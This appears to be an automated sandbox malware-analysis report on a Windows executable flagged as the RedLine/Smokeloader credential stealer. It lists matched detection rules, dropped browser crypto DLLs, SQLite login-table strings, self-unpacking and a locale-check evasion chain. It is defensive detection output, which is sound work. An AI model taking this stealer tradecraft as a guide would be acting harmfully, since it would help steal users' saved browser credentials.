Source: 00000000.00000002.3253231068.0000000002D60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/36@4/5

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C727030

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00414DE0

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

Jump to behavior

Source: c4RAHq3BNl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: c4RAHq3BNl.exe, c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: c4RAHq3BNl.exe, 00000000.00000003.2932449117.0000000023788000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2920614131.0000000023794000.00000004.00000020.00020000.00000000.sdmp, IEHDBAAFIDGDAAAAAAAA.0.dr, CAAAAFBKFIECAAKECGCA.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: c4RAHq3BNl.exe, 00000000.00000002.3276741812.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: c4RAHq3BNl.exe	ReversingLabs: Detection: 42%
Source: c4RAHq3BNl.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\c4RAHq3BNl.exe "C:\Users\user\Desktop\c4RAHq3BNl.exe"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: c4RAHq3BNl.exe, 00000000.00000002.3276907744.000000006C73D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: c4RAHq3BNl.exe, 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: c4RAHq3BNl.exe, 00000000.00000002.3276907744.000000006C73D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Unpacked PE file: 0.2.c4RAHq3BNl.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Unpacked PE file: 0.2.c4RAHq3BNl.exe.400000.0.unpack

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00416240

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004176C5 push ecx; ret		0_2_004176D8
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6FB536 push ecx; ret		0_2_6C6FB549

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

0_2_00416240

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-83993

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

API coverage: 4.3 %

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
